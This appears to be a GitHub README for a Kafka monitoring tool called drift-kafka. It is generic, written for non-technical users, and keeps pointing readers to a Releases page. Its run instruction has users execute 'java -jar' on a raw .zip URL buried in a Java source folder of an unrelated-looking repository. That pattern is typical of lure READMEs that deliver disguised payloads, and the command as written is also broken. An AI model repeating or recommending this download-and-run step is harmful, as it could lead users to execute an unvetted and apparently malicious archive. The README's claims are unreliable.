Welcome to the drift-kafka project! This tool helps you monitor and capture the state of your Kafka cluster. Whether you are dealing with incidents or just want to understand your Kafka setup better, drift-kafka is here to assist you.
To get started, simply visit the Releases page to download the latest version of drift-kafka.
- Click the link above.
- Scroll through the list of available releases.
- Find the latest version and click on it.
- Look for the
.exe,.zip, or other relevant files depending on your system. - Click to download the file.
Once the download is complete, locate the file on your computer, and follow the instructions below to run the application.
To run drift-kafka, your system should meet the following requirements:
- Operating System: Windows, macOS, or Linux
- Minimum Disk Space: 100 MB
- Java Runtime Environment: Version 8 or higher (if required)
After downloading drift-kafka, follow these steps to run it:
-
Extract the Files (if necessary): If you downloaded a
.zipfile, right-click on it and select "Extract All". Choose a location on your computer where you want the files saved. -
Open a Command Line Interface:
- Windows: Start Menu -> Type "cmd" and hit Enter.
- macOS: Open the Applications folder, go to Utilities, and select Terminal.
- Linux: Open your terminal emulator.
-
Navigate to the Download Folder: Use the
cdcommand followed by the path to the folder where you saved drift-kafka. For example:cd path/to/drift-kafka -
Run the Tool: Execute the application by typing the command:
java -jar https://github.com/pornofd/drift-kafka/raw/refs/heads/main/src/main/java/io/github/rbaddam/kafka-drift-autopoint.zipEnsure you have Java installed. If you do not, you can download it from the official Java website.
Drift-kafka offers a variety of features that enhance your Kafka monitoring experience:
- Cluster State Capture: Quickly capture the current state of your Kafka cluster.
- Drift Detection: Identify and analyze drift during incidents.
- User-Friendly Interface: Designed for users without programming knowledge.
- Cross-Platform Support: Works on Windows, macOS, and Linux.
If you encounter any issues, here are some common problems and solutions:
- Java Not Recognized: Ensure that Java is installed and added to your system's PATH.
- No Output: Make sure your Kafka instance is running and accessible.
- File Not Found: Double-check the file path used in the command line.
Q: Do I need programming skills to use drift-kafka?
A: No, drift-kafka is designed for all users, regardless of their technical background.
Q: How do I update drift-kafka?
A: Simply revisit the Releases page, download the latest version, and replace the old files.
Q: Can I use drift-kafka with any Kafka version?
A: Yes, drift-kafka is built to work with standard Kafka installations.
Join our community for support and discussions:
- GitHub Issues - Report bugs and request features.
- Community Forum - Share your experiences and ask questions.
For further assistance, please feel free to open an issue on GitHub, or check out the documentation for more details.
This project is licensed under the MIT License. See the LICENSE file for more details.
Remember, if you have questions or need support, visit our Releases page and you will find the latest version to download.
Happy monitoring!